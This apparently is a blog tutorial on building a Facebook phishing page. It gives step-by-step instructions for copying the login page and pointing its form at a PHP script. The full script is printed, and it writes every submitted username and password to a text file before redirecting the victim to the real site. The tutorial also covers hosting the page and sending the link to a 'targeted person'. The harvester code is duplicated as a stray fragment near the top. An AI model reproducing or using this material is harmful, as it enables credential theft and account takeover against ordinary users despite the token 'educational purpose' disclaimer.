how to make facebook phishing page
Through below steps anyone can easily make their own phishing page.
Step 1: Go to facebook login page, and then right click on that and select save as (ctrl+s)
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Note : This tutorial is only for educational purpose .
Step 1: Go to facebook login page, and then right click on that and select save as (ctrl+s)
Then create one folder name Facebook or anything and save that page inside that folder.
Step 2: Open html code of that page and find action=
You find something like this action="https://www.facebook.com/login.php?login_attempt=1"
Remove whole link which is in " ". And at a place of it write fb.php
Now save that html page.
Step 3: Open notepad and copy below code and save it as fb.php inside that Facebook folder.
<?php
header ('Location:http://www.facebook.com/');$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 4: Now you have to upload it on web hosting site . I prefer 000webhost because it is easy.
Create account in it .
It looks something like this
Step 5: Click on "Go To CPanel" and then go to file manager 3 .
Now upload that folder inside public_html.
It looks like below image
I have some other phishing page also so it's look like that.
Step 6: Open that Facebbok folder and open facebook.html . Copy
that link and send it to targeted person . When they
login through that page their username and password save in text file.
View id and password from text file.




Comments
Post a Comment